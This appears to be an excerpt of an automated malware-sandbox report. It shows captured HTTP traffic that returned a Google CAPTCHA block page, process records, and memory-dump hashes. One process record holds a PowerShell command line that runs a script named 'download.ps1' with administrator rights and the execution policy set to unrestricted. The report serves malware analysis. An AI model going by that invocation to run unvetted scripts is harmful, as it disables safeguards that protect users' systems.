                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 66 6f 6e 74 2d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>http://www.google.com/</title></head><body style="font-family: arial, sans-serif; background-color: #fff; color: #000; padding:20px; font-size:18px; overscroll-behavior:contain;" onload="e=document.getElementById('captcha');if(e){e.focus();} if(solveSimpleChallenge) {solveSimpleChallenge(,);}"><div style="max-width:400px;"><hr noshade size="1" style="color:#ccc; background-color:#ccc;"><br><form id="captcha-form" action="index" method="post"><noscript><div style="font-size:13px;"> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" dat
                                                                Dec 23, 2024 07:49:09.719172001 CET1289INData Raw: 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b
                                                                Data Ascii: a-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="njcWQJbzM8ExkRAKVitSgjg0LK25Q7zAVVaXABjs4t9J6kC2RHC0yrvJcnxQ65agTO_v2ZM021drd7jc36eWq-O3pR4lwiY52IXUxz8crpEaEAhxBZ3bwktTzBiMkjPfuZT3sJJ-hNLGd7iFtX_1riK
                                                                Dec 23, 2024 07:49:09.719183922 CET778INData Raw: 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74
                                                                Data Ascii: ervice</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>This traffic may have been sent by malicious software, a browser plug-in, or a s


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:01:49:03
                                                                Start date:23/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                Imagebase:0x7ff659430000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:1
                                                                Start time:01:49:03
                                                                Start date:23/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff74e400000
                                                                File size:875'008 bytes
                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Reset < >
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2760739474.00007FF88BDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BDA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bda0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a85be57a817f87e05af88e7f860fb3df65fc1bd097f0e23c755f250b743b50f
                                                                  • Instruction ID: 0d120d07ca10f3de57e7eaef7f3c12a82d9de69d9ee0317cf90fbdb5d320ee9a
                                                                  • Opcode Fuzzy Hash: 5a85be57a817f87e05af88e7f860fb3df65fc1bd097f0e23c755f250b743b50f
                                                                  • Instruction Fuzzy Hash: E5F20331D1DA869FEB9DDB68885566877E2FF99784F1800B9C00EC72E3DE28AC45C741
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2757272635.00007FF88BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6840b71067e46b7922d6032e7fd06f1c2ea9cb3bb2ec784730c79c34bba76e52
                                                                  • Instruction ID: b6bb4e302eba2c0bfde11e7face22277501907fd77c6d750774c21b5712be49e
                                                                  • Opcode Fuzzy Hash: 6840b71067e46b7922d6032e7fd06f1c2ea9cb3bb2ec784730c79c34bba76e52
                                                                  • Instruction Fuzzy Hash: C0F1A930508A8E8FEBA8DF28D855BF93BD1FF58350F04426AD84DC72A5DB749945CB82
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2757272635.00007FF88BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: df108c9d3156c7618c3c4027e257e5573a9cd7945f078a3ab784092cc0861968
                                                                  • Instruction ID: e141d23642c398c64e69030a8cf7f0c0666a726baaef16d9189432ef5a8d02b2
                                                                  • Opcode Fuzzy Hash: df108c9d3156c7618c3c4027e257e5573a9cd7945f078a3ab784092cc0861968
                                                                  • Instruction Fuzzy Hash: 4DE19630508A4E4FEBA8DF28D8557E977D1FF98350F04426AD84DC72A2DE78E945C782
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2760739474.00007FF88BDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BDA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bda0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4b5d3ace140cc0f440a5dc100e308bf7fff55ccc2dcefef4cb408e542f59beea
                                                                  • Instruction ID: 42788919d6ace015065648312b67028d3be2ae38f7103c76b3b6192d6b9147a3
                                                                  • Opcode Fuzzy Hash: 4b5d3ace140cc0f440a5dc100e308bf7fff55ccc2dcefef4cb408e542f59beea
                                                                  • Instruction Fuzzy Hash: 9022D531E1898A9FEB99DB58885577473E2FF99754F1400B9C00EC72A3CE29AC85CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2760739474.00007FF88BDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BDA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bda0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b38d587cda7f6db4b325ddcde58a497e4ebb8ca0560f3f603a94a211b0299f9d
                                                                  • Instruction ID: 6594dfb7fd9255c5ee3943c110455c318f40fc2d9df3b35e5444d51269a5990a
                                                                  • Opcode Fuzzy Hash: b38d587cda7f6db4b325ddcde58a497e4ebb8ca0560f3f603a94a211b0299f9d
                                                                  • Instruction Fuzzy Hash: AA02E631E1DA858FEB9DD76888556A4B7E2FF99394F1801B9C00EC72A3DE28BC45C741
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2760739474.00007FF88BDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BDA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bda0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 138df8174ba46f13e1445619b1f4148a0fe49129395195aaf6b9b3372e1a4706
                                                                  • Instruction ID: 2d4e39bb2c79b6ce43dec66d24f58c7441f130f0dfdc5e58820feef59bd30766
                                                                  • Opcode Fuzzy Hash: 138df8174ba46f13e1445619b1f4148a0fe49129395195aaf6b9b3372e1a4706
                                                                  • Instruction Fuzzy Hash: 7002C531E1DA858FEB99D76888556A4B7E2FF99394F1801B9C00EC72E3DE28BC45C741
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2760739474.00007FF88BDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BDA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bda0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 063080bfdee914e142b02a8006d9c136382bc4f6e0e473be31ad725d0dab5f88
                                                                  • Instruction ID: 8905830c2a7c58da0eef410aa5ae8bc6831fdfa8658463d42908bade6a85b548
                                                                  • Opcode Fuzzy Hash: 063080bfdee914e142b02a8006d9c136382bc4f6e0e473be31ad725d0dab5f88
                                                                  • Instruction Fuzzy Hash: B0F1D631E1DA858FEB99D7688855664B7E2FF99394F1800F9C00EC72A3DE29BC45C741
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2757272635.00007FF88BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ebf4b03c37622a9e317bdc69b47265336a76bbae7c9ae2e5c0cb471544a89931
                                                                  • Instruction ID: 1ccd3aba3c0f347ae9367c049f7ba50cc29d4508c2402dfad293f6dc97d8c064
                                                                  • Opcode Fuzzy Hash: ebf4b03c37622a9e317bdc69b47265336a76bbae7c9ae2e5c0cb471544a89931
                                                                  • Instruction Fuzzy Hash: B5D18F30A18A4D8FDF85DF98C495AE97BF1FFA8350F54416AD40DD72A6CA34E881CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2761047636.00007FF88BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BDD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bdd0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6dae5405b2cbcdcffcb3b1128ad51151f588bf3a37b13ba3b43ab790766c2ab0
                                                                  • Instruction ID: 56d53bfc419ba0a4fec73a028d7221a19c631f74ae91a24822c3efd2ed48ec1c
                                                                  • Opcode Fuzzy Hash: 6dae5405b2cbcdcffcb3b1128ad51151f588bf3a37b13ba3b43ab790766c2ab0
                                                                  • Instruction Fuzzy Hash: 8FA14922A0DBC55FE39A976C58546707BE1FF962A0B0D01FBC48ECB1A3D9199C45C392
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2757272635.00007FF88BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 89519a9caabcd3443090ad5781ecfbf82fa6c99a085b41a1218f2666e66e055e
                                                                  • Instruction ID: f0d2f7ee5d9a89fa9684e4efbd5425a16683849d096b8e7f5967f7cd979a983b
                                                                  • Opcode Fuzzy Hash: 89519a9caabcd3443090ad5781ecfbf82fa6c99a085b41a1218f2666e66e055e
                                                                  • Instruction Fuzzy Hash: 50B1B730508A4E4FDBA9DF28D8557E93BD1FF59350F04426EE84DC72A2DA34E985CB82
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2757272635.00007FF88BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ab9e7f886f34a740bfc4df115d0d68105e2550a55e5a7c28bd3b61d48070228
                                                                  • Instruction ID: db905e79dc30df47e96f3972f9fc8962224a76f6526cce1feca1c2cc69b13c6c
                                                                  • Opcode Fuzzy Hash: 3ab9e7f886f34a740bfc4df115d0d68105e2550a55e5a7c28bd3b61d48070228
                                                                  • Instruction Fuzzy Hash: FC41F93191CB884FDB09DB5C98066A97FF0FB99361F04416FE449C3262DA74A855CBD3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2756761974.00007FF88BA0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BA0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88ba0d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8baf171cbe4b8c12f7582b6baca6b711053cb358d34fd137165c13406cb1e75d
                                                                  • Instruction ID: 4f13a946066aa7e4b514a2a155a7abea28f8f217bc2342ee09d869cdeb02877b
                                                                  • Opcode Fuzzy Hash: 8baf171cbe4b8c12f7582b6baca6b711053cb358d34fd137165c13406cb1e75d
                                                                  • Instruction Fuzzy Hash: 0A41193140DBC48FD7568B39AC459A23FF0FF96260F0501EFD088CB1A3D625A84AC792
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2757272635.00007FF88BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 06d9d89bdfb0872dd81da3e36c1bef3f447fa58a8527198f8508d3f550baf95d
                                                                  • Instruction ID: 48eb0e9a465dfcb804592f2f7000398c98fb71759d02f9634e95943e394dabf9
                                                                  • Opcode Fuzzy Hash: 06d9d89bdfb0872dd81da3e36c1bef3f447fa58a8527198f8508d3f550baf95d
                                                                  • Instruction Fuzzy Hash: 55314D30508B8D8FDBA4DF58D845BE97BE1FF99350F00466AE84DC3262CB75A944CB82
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2757272635.00007FF88BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d851804de1911e60080a5d5b03d74d7d57268a13c6a1357ed73f4d2978893dc4
                                                                  • Instruction ID: 8d6100611f4e7d7bd411d346300cc040c06f7d1c0e0253ed315975ff34b72cba
                                                                  • Opcode Fuzzy Hash: d851804de1911e60080a5d5b03d74d7d57268a13c6a1357ed73f4d2978893dc4
                                                                  • Instruction Fuzzy Hash: 9E212E3190C74C4FDB59DFAC98497E97BE0EB9A321F04426BD048C3156D6745455CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2757272635.00007FF88BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c00f520fe77c6be4fc677f0dda79f1e8cdbfd0f3cb11a9f4b3666ac24f1ae486
                                                                  • Instruction ID: bb8aa573526bed3f9054b762c9ef0157faf8266b64751669aa199305b4957901
                                                                  • Opcode Fuzzy Hash: c00f520fe77c6be4fc677f0dda79f1e8cdbfd0f3cb11a9f4b3666ac24f1ae486
                                                                  • Instruction Fuzzy Hash: 5E21F73111CB498FD749DF18D891ABA77E0FFD5354F50057DE08AC71A6DA2AA882CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2757272635.00007FF88BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 54da0093d3b392bba89412d8f6dbf9d8cf6002ef2aaaee9eac133a260b574f4b
                                                                  • Instruction ID: 5ed79e1397bd8d699c12d2fa2d4358e82af872e6f84793c8ee5fe82eb612ab75
                                                                  • Opcode Fuzzy Hash: 54da0093d3b392bba89412d8f6dbf9d8cf6002ef2aaaee9eac133a260b574f4b
                                                                  • Instruction Fuzzy Hash: 1121BA3091858FCEFBB4AB65CC55BF832D0FF89359F404535C44D8A5A2CB396985CB02
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2761047636.00007FF88BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BDD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bdd0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 133619fc5f35bc5a47c94d82c679c262430283b05f52a29e9fd625806fde2a19
                                                                  • Instruction ID: e9ae474dc42aa21980368ab2fa64b7b30139b026711e1cf6b09a2b646b15d7aa
                                                                  • Opcode Fuzzy Hash: 133619fc5f35bc5a47c94d82c679c262430283b05f52a29e9fd625806fde2a19
                                                                  • Instruction Fuzzy Hash: A9F05431A0D5589FD75DEB9CE4419A873F0FF4936071800B6E14DC7563DA2AEC45C751
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2757272635.00007FF88BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff88bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a564c926fee89abd58e9b9c03fccecd9b3c73566bad1c58ee407a313cac1c3f0
                                                                  • Instruction ID: 4feffe780e4660a1d1e2700cdc16528a914a89b8248deb64ce0ca15b316805a2
                                                                  • Opcode Fuzzy Hash: a564c926fee89abd58e9b9c03fccecd9b3c73566bad1c58ee407a313cac1c3f0
                                                                  • Instruction Fuzzy Hash: D1F024308086C98FCB0ADF2888095D5BFE0FF26250B0402DBE459C31B2DB64A858CB92